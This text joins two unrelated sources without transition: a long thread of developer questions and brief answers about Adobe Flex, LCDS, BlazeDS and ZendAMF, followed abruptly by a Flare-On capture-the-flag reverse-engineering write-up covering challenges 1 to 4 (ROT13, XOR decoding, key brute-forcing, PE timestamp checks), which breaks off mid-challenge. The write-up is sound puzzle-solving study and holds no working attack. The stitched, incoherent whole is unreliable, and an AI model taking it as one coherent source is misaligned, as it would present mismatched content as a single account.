But when I place amfphp on server and try to acess it from my PC by givin url with that server ip then it will not access the server amfphp file?
Why?
I need to c demo to client. Please revert early
thank you
Hi Sujith,
I need to sync the changes happening in the server object model to the client currently loaded ( might be few only depends) ( Data Grid in client)
can you suggest what would be the best to go ?
should i go with LCDS messaging feature or data management service feature ?
If it is messaging feature, what would be the channel i should use for performance ( huge volumn of data)
please reply
Thank you
I watched your episode: Advanced Data-Centric Application Development with Flash Builder and I was very impressed with this technology. I have also watched many Flash Builder training videos.
I am a project manager for a POS (Point of Sale) company. Currently we offer a POS application written primarily in Cobalt for MS Windows environment on touch screen hardware. We our using “Windows POSready 2009” as the operation system but would like to offer our application on other platforms. Our POS system works both as single client or multi-client environment, as well as multi-revenue environment with single or multi-clients in each revenue center. For example, Revenue Center 1 (1 client), Revenue Center 2 (3 Clients), Revenue Center 3 (2 Clients). etc pointing to one server.
I would like to move this POS application over to a Flash application but I want to make sure that the Flash technology will meet all our needs, Please let me explain what these needs are with regards to what we call a thick client concept.
Our application works as a client server application with an Admin portal application that handles all changes to the client. The client handles all POS operations in a retail environment. This includes, Cash, Credit Card, Gift Card (Magnetic, Barcode, Proximity Chip, etc..), Per diem (Transaction, daily, Weekly and Monthly limits that reset), Payroll deduction transactions (Using a ID Badge (Magnetic, Barcode, Proximity Chip, etc..) and Company Department Charges using an ID #.
With Payroll Deduction, Gift Cards, and other Declining and Per Diem transactions, there needs to be a way to verify per diem limits, declining balances and Department Charge Limits using an ID system.
Every Transaction is synchronized with the server and can operate regardless of the server’s online/offline status. If the server is offline then all transaction are just stored locally until the server is back online. This also means the Customer database that holds Customer information needs to be available even when the server is offline. Both the Customer ID number and the Badge number can be the same number (but in many cases are different) but they do need to be unique from other ID numbers, like gift cards and other declining balances cards. Currently all Ids are stored in one database but this could change and should change in my option. I think a database for Employees another database for Company departments, another for gift cards, etc
When the server is offline and a declining card is used, the last known balance on the client is used and then updated when the server when back online. This is a slight chance that if the server is no brought back online in a timely manner, a person can go into the red if the ID is used on more than one client in a given revenue center. When the server is back online all clients would synchronize with the server and the negative balance would be reflected. This however does not normally happen and would be resolved the next time a person added more money to their card. The risk of this happening out weighs the benefit of not interrupting the normal POS daily operation.
The item file that stores all item details and prices including scan codes also needs to be available whether the server is online or offline. All changes and updates (Price change, adding/deleting items, adding Employees and company departments, changes to the UI (adding/deleting/modifying Item buttons, function keys, media keys) made to the client are done through admin portal application that first makes changes to the server side and then are automatically sent to the client. Normally any UI changes will be updated once the client logs off and back on to refresh the touch screen. I hope this can change with Flash and any UI updates can refresh without the user logging off the client.
Reporting of data needs to be available from either the client side or through the admin application. The client side would need to be able to print reports even when the server is offline. Currently, if the server is offline, reports will only be available for transaction completed on the client the report is being generated from. When the server is online, reports can be generated from any client within an individual revenue center for either all clients in the revenue center (Grand Totals) or individual totals for any single client.
Closeout procedures need to be able to run on a single revenue center level, either on a single client or on a single revenue center. This is referred to an X readying and a Z reading respectively. Currently this is handled on the client side where a user runs a Client EDO (end of day) or a Revenue EOD. Client EOD clears all totals and a report is generated and is used to balance the drawer and prepare the bank deposit. The Revenue EOD closes out the Revenue center for the day and is run on Client #1 in each Revenue Center. I would also like to have the ability to run this on the server side once we move to a flash application.
The application needs to be able to auto launch when the operation system is loaded and does not allow the user to have access to the desktop unless an exit code (only known to an admin) is used to exit the application. The application should now show any part of the desktop. Currently if a keyboard is connected to the system, a user could gain access to the desktop. We do not see this an issue because normally a technician or an admin would be the only ones doing this. There is also the need sometimes to have the admin portal running on the client and having the ability with a keyboard to switch between both applications.
There are several main reasons I would like to move to a Flash Application. The first is the ability to create a more visual robust looking application and experience for both the client side (POS) user and the admin portal user. The second would be to have an application that can run on any operating system. The third would be to have an application that takes full advantage of Flash Builder Technology to more easily deploy changes and new application version.
I appreciate that you took the time to read through this and I look forward to your response on whether Flash would be a platform that we could use.
Best Regards,
Joe
Hi Sujit,
1) Is there any way to open the .txt and word files to open in the browser using “Flex” If so please give me one example with code.
2) How to swap the columns in Advanced DataGrid.
hi,
i m using flash builder burrito trial version. it works well few days. after few days, when i am opening flash builder burrito, the eclipse start up page appears, then after 30 seconds it will disappear. flash builder burrito not open. what should i do to work in this?
Hi, Sujit,
I am new to Flex and model driven development. I am using Flex 4 and LCDS to build an application to create two records in MySQL DB. One record in Account table and the other in Employee table. The relationship is one account has many employees.
Account table
idaccount
domainname
Employee table
idemployee
idaccountemployee
A form was created to capture the email and when a button is pressed, will create a record in account table with a slice of the email (the domain part) stored in domain name. Another record in employee table with the email stored in emailaddress.
Here is the problem:
How can I assign the value of idaccountemployee which happens to be the value of idaccount?
example:
Account table
idaccount = 36
domainname = aaa.com
Employee table
idemployee = 92
idaccountemployee will be 36 (same as idaccount)
Hope to hear from you soon!
hi,
i have done changes in flex. its working fine in design view but its not working when i run the application in browser. thanks
Hi Sujit,
Need your help on understanding on feasibility of using flex for product development. In a nutshell GUI will have hierarchy of components which will be used to design a flow of specific task. When components are dragged to design canvas and assign attributes(data) to component, the XML has to create with data of components. When the same task re-opened, the same design view should be appeared in canvas along the data included in components.
Can you please tell if this is doable using flex? If it is possible how difficult it is…
Help is really appreciated.
Thanks
Ravindra
Hi Ravindra,
Its definitely doable. See if this link helps
Hi Vaishnavi,
Can you please explain what is not working.
Hi David,
Having a relationship between these two entities in the model should do the work.
Hi Pandi,
Sorry to hear this. Can you please share the .log file. You can find the log file under /.metadata folder. Please send the log file to sujitr@adobe.com
Hi Sreecharan,
If you want to display text in Flex application itself, then try loading it using HTTPService and then displaying the content. If you want to display in browser, then try navigateToUrl.
Hope this helps.
Hi Sagi,
Go with Data Management service. If you chose Data Management service, it will take care of syncing the data on the client and also manage the data on the client. If you chose messaging service, then you have to make sure the data is in sync on the server and the client, by sending exchanging messages. Try and have a look at the ASObjectAdapter in Data Management service.
Hope this helps.
Hi Sridhar,
You might need to place crossdomain file on your server. Please find more details here
Hope this helps.
Hi Amit,
Please make sure your external folder is included in classpath.
Hope this helps.
Hi Deepak,
Please check this article
Hope this helps.
Hi Jonathan,
Adding a cross domain file is definitely good. If you don’t want to continue to use PHP on server side, you can consider using ZendAMF instead of BlazeDS.
Hi Krishna,
Please find details here
Hope this helps.
Hi lreddy,
Can you please share code to reproduce this.
Hi syeath,
Try adding a web service operation which will let you access the data stored in your server session. Use this operation to get the objects in session onto Flex side.
Hope this helps.
Hi Doby,
BlazeDS has messaging service using which you can definitely achieve this. Pleas check article in the URL below to chose right Channel for your application.
Hope this helps.
Hi Ram,
Check this article
Hi Jitendra,
Once you can successfully invoke the code in Struts layer, from there you can have any Java class to communicate with Databases. Try looking for articles which explain how to communicate with databases from Java.
Hi lreddy,
Please try check this URL
Hi Chowdary,
Please check this article Instead of passing a String as shown in that article, you can pass instance of you VO. Also check this article
Hope this helps.
Hi Akash,
Is the path to your PHP classes listed in the “used paths” shown in the error log? When deploying Zend on servers, you just need to make sure the amf_config.in is properly configured, looks like you have that done. So, should work fine.
Hi Chandu,
Please check if the article in the URL below helps.
Hi Gerald,
Please make sure services-config.xml etc are properly configured. If you can share error details, that will help in understanding what might be going wrong.
Hi Elmak,
Not sure. If you haven’t looked at my article below, see if that helps. They are not discussing about setting up in Eclipse though.
Hope this helps.
Hi Sunil,
You can check Data Management service in LCDS else try using messaging service using which you can push data in various ways using different channel types. Please find more details in the URLs below.
Hope this helps.
Hi Edgar,
You might have to add crossdomain file. You can also have a look at clustering. Please find more details in the URLs below.
Hope this helps.
Hi Angela,
If you want to invoke Java classes from Flex applications without any web servers, check this –
If you have Java code on a server and want to invoke the same from client applications, which might be running in a browser or as AIR applications check this –
Hope this helps.
Hi Aubry,
I am sorry, not sure what is going wrong.
Thanks for your reply. Can you do prototype for me..Can i tlk to you in detail?
please send me an e-mail ravindra@idatamatics.com
Thanks
Ravindra
How to external fonts dynamically in Flex4. Need to use it in RTE. Thanks.
Hi Siva,
Please check “Step 3” in the URL below.
Hi Irfan,
Requests to the server from Flex applications are by default asynchronous. For example, if you have 2 requests made to server one after another, both are invoked immediately one after another.
Hi Amit,
See if you can override couple of functions in AMFChannel or NetConnectionChannel classes to get this working. Other than that I don’t know of any other way.
Hope this helps.
Hi Peter,
Please try using second option and access the Servlet HTTP session. The session created for Remoting calls and this are same.
Hope this helps.
Hi Naveen,
Please visit the URL below, you will find options to contact Adobe regarding the pricing etc.
Hi Ravindra,
Sorry, will not able to do a prototype for you.
No issues, Can you please let me know , if you know any flex export looking for a part time opportunity
Really appreciate your help
Hi Sujit,
I want to create and delete Destination Dynamically, I am able to create messaging service destination dynamically but How Can I Create Dynamic Remote Object Destination
I am creating Dynamic Messaging Destination using this code
MessageBroker broker = MessageBroker.getMessageBroker(null);
//Get the service
MessageService service = (MessageService) broker.getService(
“message-service”);
MessageDestination msgDest =
(MessageDestination)service.createDestination(id);
But for creatingDestination(id) of type RemoteService , there is no Flex Class available
Hi Ravindra,
Please find if this URL below helps.
Hi Vijay,
Please check the article in the URL below.
Hello Sujit,
Could you explain how I would setup my flash builder 4 project to use RestfulX to connect to Couchdb? This is the closest I could find doing a search on Google.
Thank you for your time and effort.
Best regards,
Joe Coyle
Hi Sujit,
I am trying to develop a Flex based NNTP client. Can you please point me in the right direction for this. As in, which particular Flash Builder 4 feature would be helpful here, etc.
Thanks in advance.
Regards,
Pooja
Hi..
i have a datagrid in my web application, i have add a checkbox to datagrid using itemrenderer. how can i get the value of checkbox?
hi sujit,
i am currently pursuing bachelors of Engineering from MITCOE,Pune.I am in the final year and need help in my project..My project is a real time implementation of the trains journey from source to destination; wherein i am trying to create a project for:-
1.Automization of signaling
2.Train positioning
3.Track changing
4.Collision avoidance
I have been told to use Flash builder 4 for the front end(the map of tracks) and then embed this on .NET program wherein the position of the train wud be shown on the Flash application based on the input from the .NET code…
We are depicting the trains and the stations as Laptops such that the train wud have a GUI and so wud the stations.We are then going to create an Ad-hoc network such that the train wud send its position via bluetooth to the station where the train wud be shown as a dot.
So i was wonderin if all this is possible wid Flash Builder 4 in front end and .NET in backend…
Hello Sujit,
I try to a simple example by using Model Driven Development with Flex Builder 4 and LCDS 3.1 for tree weeks. I’m about to lose my mind. I have tried everything in my mind and lots of tutorial but i couldn’t . Plesae help me;
i have got the error when i run the flex aplication.
——————————————————————–
Error: Invalid configuration setting for reconnect. Valid options are IDENTITY or INSTANCE
at mx.data::Metadata/checkReconnect()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:2178]
at mx.data::Metadata/applyConfigSettings()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:2099]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:119]
at mx.data::Metadata/initialize()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:181]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3245]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3133]
at mx.data::DataStore/getAllConfigCollections()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3135]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3416]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::MessageAgent/channelConnectHandler()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:903]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::ChannelSet/channelConnectHandler()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\ChannelSet.as:1091]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::Channel/connectSuccess()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\Channel.as:1159]
at mx.messaging.channels::RTMPChannel/setUpMainNC()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\messaging\channels\RTMPChannel.as:468]
at mx.messaging.channels::RTMPChannel/tempStatusHandler()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\messaging\channels\RTMPChannel.as:610]
Hi Sujit,
I am working on Flex 3 with LCDS. My project is build on JMS queuing. According to the requirement of my project, if there are 10 messages waiting in the queue to be read and updated in Flex UI,it should update only the UI client who is entitled for a particular message. So my question comes as how to identify which client posted the request and how to achieve mapping between the client req and response in queue based scenario?
Is there any built in mechanism in Flex LCDS to uniquely identify client? The approaches that i could think of was eiter tracing session ID’s or UID’s?
What could be the best solution according to you ?
Please guide as am realtively new to Flex.
Thanks,
Neha
hi sujith ,
I have two doubts..
1.When am trying to do a remote object operation and connect to java code to retrieve values to my data provider
faultCode:Client.Error.MessageSend faultString:’Send failed’ faultDetail:’Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Status 404: url: ‘”
why is it so??
2. i have to limit my datagrid rows as per the no.s selected. if 10 is selected 10 rows must be displayed.
thank u
asha.
Hi sujith,
I am a flex developer and new to AIR.I have doubt how to call Java class in a AIR application.
Thanks,
Anand
Hi
I have a Vbox , i want to display text radio buttons and text area. text is gonna be the same for each vbox, but radio button or text area depends on the what kind of question will be coming from database. i have to use repeater to display the Vbox???
Can you help with how this repeater can choose whether to display radio buttons or text area by checking from the data source??
Hi Sujit,
I am developing some air android appln using AS 3.0. I want my android appln to invoke other android application. I tried creating custom URI in the manifest xml file. But i dont know how to launch it through actionscript 3.0. Pls guide me.
my xml code of android app being called:
<data android:scheme="callapp"
i used… navigateTOURL?(new URLRequest(“callapp://”));
but it didnot work.
Thanks in advance.
-Ganesh
Hi,
I’m a new user of flash builder 4. I’v done a project on local server ( MAMP on MAC OS X ) with PHP service that connect to a mysql DB. I need to put this project on a reel server. When i put it on the server ( by ftp, server php 5.2.9 and mysql 5. Zend framework at the root ) the project work but i can get any connection with the php service. I have been looking the web for two days, and trying a lot of tips but nothing change. Can you help me ?
best regards
a few hours later still this error :
Class “IntervenantsService” does not exist: Plugin by name ‘IntervenantsService’ was not found in the registry; used paths:
:
#0 /web/hosts/: Zend_Amf_Server->_dispatch(‘verifIntervenan…’, Array, ‘IntervenantsSer…’)
#1 /web/hosts/: Zend_Amf_Server->_handle(Object(Zend_Amf_Request_Http))
#2 /web/hosts/: Zend_Amf_Server->handle()
#3 {main}
Help me if you can. I dont get any answer in the documentation or in any tutorial
Hi Pooja,
If you are asking if DCD features in Flash Builder will help in building NNTP clients, I am sorry it doesn’t.
Hi Nirav,
You can override the setter function of “data” property and set the updated value in one of the properties. You can access the objects from dataProvider property of DataGrid. Else you can also try dispatching a event.
Hope this helps.
Hi Tanay,
Yes, its possible.
Hi Kemal,
Can you please share the fml file.
Hi Neha,
Please check this article
Hope this helps.
Hi Henri,
Is ‘IntervenantsService’ class developed by you?
Hi, thanks for helping me
The php class is done by fb by a connection at my mysql local base ( a copy of my real one)
I have change some sql request inside but nothing more.
I can send you the code if it can help to understand the problem
best regards
Hi Henri,
Please try following the steps below:
1. Make sure ZendAMF is deployed on your server. This is a folder named “ZendFramework”
2. Change settings in amf_config.ini if required. You can find this file in your web application folder.
Hope this helps.
Hi Ganesh,
Please check if the URLs below:
Hope this helps.
Hi Anil,
You can chose to use repeater or any List based components. If you are using Flex 4, you can try DataGroup component as well.
Hi Asha,
Looks like either your server is down or BlazeDS is not properly configured. For second one, check this
hi,
Amf_config.ini is set as follow :
[zend]
webroot =
zend_path = ../ZendFramework/library
[zendamf]
amf.production = true
amf.directories[] =backoffice/services
response of gateway without any variable is Zend Amf Endpoint. so seems to be working.
If i change anything in the amf_config.ini i get a error channel disconnected .
i really dont get any idea of what is going wrong. …
thanks a lot for your help.
best regards
Hi Sujit,
I am quite new to Flex.
I have a struts 2.0 page where we shld have a graph, and 2 datagrids.
For Chart , I m trying to use FLEX .
I am trying to pass a ArrayList of Objects to a FLEX SWF/mxml file through HttpRequest object.
The mxml will NOT call any java remoteService/HttpService or Webservice.
In this case how my .as file of java object will map to the java object.
Looking forward to your reply.
Thanks
is it possible check credentials for login and check them against a local database(sqlite) with out any serverside scripting.
meaning get the username and password and check them against user info in the database in order to login.
is it possible to do in AS3 only?
thanks
Hi Sujit,
I am using Fiber, RDS, and LCDS. I am to the point where I would like to build a real app, but security is a major concern.
Is it possible to secure the destinations created by Fiber/RDS? I know how to secure destinations that I define in remoting-services.xml, but I can’t figure out how to secure the dynamic destinations created by Fiber/RDS. I have created my own custom authentication/authorization LoginCommand class that does the actual authentication. How do I configure Fiber/RDS to use that custom class?
Thank you,
Collin
Hi Sujit,
Need your help its very urgent, We need to develop one Data Management System using Flex, AIR and we need to support application offline also, when its online then data sync as to happen.
For this we have LCDS & clear toolkit is available but client is very small cant take LCDS licence and clear toolkit wont even install properly.
can you please suggest any way to provide offline & online & sync, if you provide some guide line,we can develop, I have already seen how LCDS is working but for developing it make take lots of time, can you please suggest any idea please
thanks
vijay
Hi Sujit,
I am mohan working in flex i am have problem here how to reduce the loading time of the application.
instead of using embed is that any other way to supply skin at run.
How to reduce the swf file size for release …..
Hi Sujith,iam a java programer,i have gone thru articles on flex but still need to learn Flex can u pls provide me a way to learn flex in a better way
sir,
I am a final year engineering student, we are doing a project for:
1:positiong of train .
2:collision avoidance.
my problem:
MXML has a tag.now it can have ‘xfrom’,’xto’ and ‘xby’ attributes , and if all three given together,MXML ignores xby, but we to specify all 3 to make the train move along a path and to make it cover a certain number of pixels thus showing the train’s current location
we are using lines(path) as individual entities to simulate movement . is it possible to treat an entire path as a single object and make the rectangle move along this object?
Hi Sujit,
I have attended your workshop on developing multiscreen applications using Flex at IIIT(during AVM annual meet)
Which is good when we want to develop mobile apps,
whether i should go for J2ME or should i go with Flex new features in Flash Builder 4.5 Burrito.
i am a java programmer,which platform should i choose when developing mobile apps.
i am intrested in flex too.
one more question, Which one is better when we compare JavaFx and Flex. I don’t know about JavaFx.
hi sujit
we are building an application in Flash Builder 4.
i am using a tag to move a rectangle.
I want to control the speed of this rectangle via a VSlider…How do i achieve this.?
i am using a tag to move it
SORRY for sending once again, i have not checked the notify and subscribe check boxes while posting.
Hi Sujit,
I am a beginer in flex. I am developing a whiteboard application in Flex. The board becomes very slow after a few minuts. It seems that it is because of the persistance of graphic.draw commands. Is there any option to negate this effect?
Thanks in advance,
Best regards
Binu
Hi Sujit.
I am hoping you can help me out on this issue.
I am trying out mobile application development with Flex 4.5 following the Tutorial “Build a mobile application in an hour” and for the past three days I have been stuck trying to connect the Data Services in the IDE to the BlazeDS based application running on tomcat.
The error message reads “RDS server message: could not initialize class com.adobe.rds.core.services.Messages”
I have checked the url multiple times and it is correctly pointing to the BlazeDS Turnky Server running on port 8400. The call to test.html to check the testdrive application is working correctly. Also when I call“> I am getting a blank page as expected. The project’s Flex Server setting are:
Root folder: C:\blazeds-turnkey-4\tomcat\webapps\testdrive
Root URL:
Context root: /testdrive
Output folder: C:\blazeds-turnkey-4\tomcat\webapps\testdrive\MobileTestDrive-debug
Any suggestions on how I get beyond this point will be greatly appreciated.
Dear Sujit
I have got a Galaxy tab p1000 , it is great but I have a problem with flash player.
the flash player work well with Vimo for video but for application for example I had a flex3 app it works well via tablet with fp 10.1 but for a flex 4 spark app it getting error #204 .
I have updated FP to 10.2 But I got still error #204.
what you think , it is about spark problem with FP android version?
what must I do to overcome it?
BR
Farid Valipour
Hi Sujit,
I have a quick question about BlazeDS. I’m wondering how you can turn off the “batching” it does when you fire multiple requests to the same service. Our application needs to return data for a number of widgets as the data is available but since we fire the requests when the app loads it appears BlazeDS batches them into one request and then server batches the respones.
Any help would be appreciated.
Hi,
I am a FLEX+PHP developer, trying to use JAVA in backend. I have followed your instructions multiple times but yet not able to set services through Blazeds server. I am not getting Service Lists in “Selecting Remoting destination” stage. I have changed in services-config.xml page and add ‘
tutorial.HelloWorld
‘ to remoting-config.xml, whereas already created a remoteobject with destination “datagridService” in .mxml file.
Please tell me if any other changes are required? I am Getting this error “No destinations configured on server. Click on ‘How to use BlazeDS/LCDS?’ link to know how to configure destinations.”
Help me.
Hi Sujit,
i am basically a java programmer.In my project iam using the blazeds for interfacing the Java and the Flex.In my java programming i am having an object which contains BitSet, but in the flex code i am not able to get this bitset instead it is jst giving as an regular object.So can you suggest me how to send the bitset from java object to flex code.
|
https://sujitreddyg.wordpress.com/what-am-i-doing/
|
CC-MAIN-2017-09
|
refinedweb
| 40,588
| 66.54
|
Control.
Default Style Key Property
Definition
Important
Some information relates to prerelease product that may be substantially modified before it’s released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
Gets or sets the key that references the default style for the control. Authors of custom controls use this property to change the default for the style that their control uses.
Equivalent WinUI property: Microsoft.UI.Xaml.Controls.Control.DefaultStyleKey.
protected: property Platform::Object ^ DefaultStyleKey { Platform::Object ^ get(); void set(Platform::Object ^ value); };
IInspectable DefaultStyleKey(); void DefaultStyleKey(IInspectable value);
protected object DefaultStyleKey { get; set; }
Protected Property DefaultStyleKey As Object
Property Value
The key that references the default style for the control. To work correctly as part of theme style lookup, this value is expected to be a System.Type value.
Note
Visual C++ component extensions (C++/CX) uses a string that is the qualified name of the type. But this relies on generated code that produces a TypeName once accessed by a XAML compiler; see Remarks.
Remarks
DefaultStyleKey is one of the very few protected properties in the Windows Runtime API. It's intended only for use by control authors, who will be subclassing some existing control class and therefore have the necessary access to set this property. For many custom control scenarios where you'll be setting DefaultStyleKey, you'll also be overriding OnApplyTemplate.
The return type of DefaultStyleKey is loosely typed as Object in the syntax, but the XAML style system will expect the value to provide a type reference:
- For a control that has its logic written in C#, the value of DefaultStyleKey should be an instance of System.Type. Typically you set this value in the default constructor:
public CustomControl1() { this.DefaultStyleKey = typeof(CustomControl1); }
- For a control that has its logic written in Microsoft Visual Basic, the value of DefaultStyleKey should be an instance of System.Type. Typically you set this value in the default constructor:
Public Sub New() Me.DefaultStyleKey = GetType(CustomControl1) End Sub
CustomControl1::CustomControl1() // public: in the header. { DefaultStyleKey(winrt::box_value(L"App1.CustomControl1")); }
- For a control that has its logic written in Visual C++ component extensions (C++/CX), the value of DefaultStyleKey should be a namespace-qualified string that is the name of the custom control class. Typically you set this value in the default constructor:
CustomControl1::CustomControl1() //public: in the header { DefaultStyleKey = "App1.CustomControl1"; }
Note
Ultimately the string alone isn't enough to support a Visual C++ component extensions (C++/CX) type reference. If you use the Add / New Item / Templated Control options in Solution Explorer, the templates and support for Visual C++ component extensions (C++/CX) and XAML generates classes that give IXamlMetadataProvider info. The XAML compiler can access this code when the XAML is loaded, and uses it to validate and create types and members and join the partial classes. As far as what you define in your own app code, the string is all you need. But if you're curious you can have a look at the XamlTypeInfo.g.h and XamlTypeInfo.g.cpp files that are generated.
Control authors could choose to not provide a value for DefaultStyleKey, but that's uncommon. The result would be that the default style is the one as defined by the base class. In some cases (like for ContentControl ) the value is null. Even if you choose to not redefine the value, make sure that the original default style is useful for rendering your control.
When a XAML control is loaded, the rendering process starts, and the system is looking for the correct template to apply, what's being loaded is the XAML default style for the control, including its template. Included in the Windows Runtime is an internal copy of all the default styles for all the XAML controls that the Windows Runtime defines. The type reference in DefaultStyleKey tells the system which named XAML resource to load as this style. In XAML form, the styles really are keyed by type even though there's no mechanism in Windows Runtime XAML that defines a type reference explicitly. But for any TargetType value, which is the attribute that holds the key for lookup, it's implicitly assumed to represent a type reference in the form of a string. For example, DefaultStyleKey from a Button is a System.Type instance where the Name is "Button", FullName is "Windows.UI.Xaml.Controls.Button". The system uses this info to know to load the Style from the internal resources that has
TargetType="Button".
Custom controls usually aren't in the default XAML namespace. Instead, they're in a XAML namespace that has a using: statement to reference the app's code namespace. By default, projects create a prefix "local:" that maps this namespace for you. You could also map other XAML namespaces to refer to additional code namespaces for controls or other code that your app defines.
The "local:" prefix (or some other namespace that maps to your app's code and namespaces) should precede the name of your custom control, when it's in XAML as the TargetType value. This is also already done for you by the starting templates; when you add a new control, you'll see a generic.xaml file that contains just one style. That style will have TargetType value that is a string starting with "local:" and completed by the name you chose for your custom control class. To match previous examples that set DefaultStyleKey in a
CustomControl1 definition, you'd see an element for
<Style TargetType="local:CustomControl1"> defined in the starting generic.xaml, and that style defines the control template as well as setting other properties.
Note
The "local:" prefix is isolated to the XAML where it's defined and used. XAML namespaces and the prefixes only have meaning within XAML and are self-contained to each XAML file. DefaultStyleKey values in code don't include the prefixes.
|
https://docs.microsoft.com/en-us/uwp/api/windows.ui.xaml.controls.control.defaultstylekey?view=winrt-22000
|
CC-MAIN-2021-49
|
refinedweb
| 989
| 53.1
|
This year, I happened to finally have a chance to be in a good position to play Flare-On CTF, a yearly CTF published by FireEye. This year’s edition offered 12 reverse-engineering challenges to solve in 6 weeks.
This post is mostly a dump of the notes taken during all the challenges. Link to challenges and scripts are also given.
For quick jump:
All the challenges are in the ZIP file that you can download here.
The Arsenal
My complete arsenal was (in no particular order):
- Modern-IE Windows VM
- IDA Pro
- WinDBG
- CFF Explorer
- HxD
- PEiD
- AIP Monitor
- SysInternals Suite
- Binary Ninja
- GDB + GEF
- SimAVR
- JDB
- JADX
- GenyMotion
- Python modules:
- DnSpy
- Interactive Delphi Reconstructor
- Wireshark
- Diaphora
- xdotool
And a lot of C and Python snippets…
Challenge 1
Instruction
Welcome to the Fourth Flare-On Challenge! The key format, as always, will be a valid email address in the @flare-on.com domain.
Solution
By checking the HTML source code, we see:
Classic ROT-13, can be decoded by:
>>> "PyvragFvqrYbtvafNerRnfl@syner-ba.pbz".decode("rot13") ClientSideLoginsAreEasy@flare-on.com
Challenge 2
Instruction
You solved that last one really quickly! Have you ever tried to reverse engineer a compiled x86 binary? Let's see if you are still as quick.
Solution
IgniteMe.exe
is a small PE that reads
what a buffer from stdin and chain-xor it in reverse (with an IV set to
4 by
function at 0x00401000) and then compared to an
encoded_key located at
0x0403000:
00403000 0d 26 49 45 2a 17 78 44-2b 6c 5d 5e 45 12 2f 17 .&IE*.xD+l]^E./. 00403010 2b 44 6f 6e 56 09 5f 45-47 73 26 0a 0d 13 17 48 +DonV._EGs&....H 00403020 42 01 40 4d 0c 02 69 00 B.@M..i.
It’s a classic simple XOR encoding challenge, the script IgniteMe.py was used to decode it :
$ py IgniteMe.py [...] result R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com
Challenge 3
Instruction
Now that we see you have some skill in reverse engineering computer software, the FLARE team has decided that you should be tested to determine the extent of your abilities. You will most likely not finish, but take pride in the few points you may manage to earn yourself along the way.
Solution
greek_to_me is a PE file that will
start by binding and listen tcp/2222, and receive 4 bytes from the socket. This
value read will be used to decode the instructions at 0x40107c to 0x4010ee:
Being lazy, I’ve reconstructed this C script from IDA decompiler which allowed me to perform simply a brutefore locally:
$ make greek_to_me $ ./greek_to_me Starting new process 31673 with range(0, 0x20000000) [...] Found valid key: 536871074 Found valid key: 1610612898 Found valid key: 1073741986
With those keys, we can re-run the binary by sending those value (properly encoded) to the socket on tcp/2222:
import socket, sys, struct valid_keys = [162, 536871074, 1610612898, 1073741986] def p32(x): return struct.pack("I", x) s = socket.socket() s.connect(("127.0.0.1", 2222)) s.send(p32(int(sys.argv[1]))) print s.recv(0x100)
which will show as a response:
Congratulations! But wait, where's my flag?
But by setting WinDBG to break at 0x040107c and by passing the correct decoding key when prompted, a whole new code shows up:
Revealing the key to this level.
Challenge 4
Instruction
You're using a VM to run these right?
Solution
This challenge was very fun at the beginning, but the last part really sucked:
notepad.exe is a small PE that by all
appearance spawns Windows classic
notepad. I was fooled for a bit at first by
the instruction to this challenge, I expected a malware or something hostile,
but it is nothing of the sort. Disassembling the
start in IDA shows a bunch of
interesting strings:
%USERPROFILE%\flareon2016challenge ImageHlp.dll CheckSumMappedFile User32.dll MessageBoxA
So I created the folder
flareon2016challenge and spawned
procmon:
clearly showing that
notepad is looking for something in this
directory. Breaking
on
Kernel32!FindFirstFile
we discover that the loop at 0x10140B0 performs
a
classic file lookup in directory,
and calling the function at 0x1014E20 when a file is found. That’s where stuff
gets interesting.
notepad maps the file in memory, checks if it started with
MZ, gets the
value at offset 0x3c, then jump to
the offset and checks if the mmaped memory at this offset is equal to
PE. It
looks like it is searching for one or more valid PE executables in the
flareon2016challenge folder. It does a few extra checks (is it Intel machine
in PE header, etc.) and if everything passes, calls 0x010146C0.
This function will take the timestamps from
the
PE header
of the current program (
notepad.exe) and the PE file mapped to memory. If
those 2 values are the ones expected, then 2 functions are called successively:
- Function @ 0x1014350 which will format the timestamp of the mapped file and
MessageBox-it
- Function @ 0x1014BAC which will open a file
key.binin
flareon2016challengefolder and write 8 bytes from some offset in the mapped file into it.
Or in horrible pseudo-code:
encoded_buffer = [0x37, 0xe7, 0xd8, 0xbe, etc..] # populated at 010148F3 if notepad.pe.timestamp == '2008-04-13 11:35:51' and mmap.pe.timestamp == '2016-09-08 11:49:06': MessageBox('2016-09-08 11:49:06') Write_8_Bytes_From(src=mmap, dst=`key.bin`) elif notepad.pe.timestamp == '2016-09-08 11:49:06' and mmap.pe.timestamp == '2016-09-09 05:54:16': MessageBox('2016-09-09 05:54:16') Write_8_Bytes_From(src=mmap, dst=`key.bin`) elif notepad.pe.timestamp == '2016-09-09 05:54:16' and mmap.pe.timestamp == '2008-11-10 01:40:34': MessageBox('2008-11-10 01:40:34') Write_8_Bytes_From(src=mmap, dst=`key.bin`) elif notepad.pe.timestamp == '2008-11-10 01:40:34' and mmap.pe.timestamp == '2016-07-31 17:00:00': MessageBox('2016-07-31 17:00:00') Write_8_Bytes_From(src=mmap, dst=`key.bin`) elif notepad.pe.timestamp == '2016-07-31 17:00:00': key = ReadFileContent('key.bin') assert len(key) == 0x20 decoded_key = DecodeWithKey( encoded_buffer, key ) MessageBox(decoded_key)
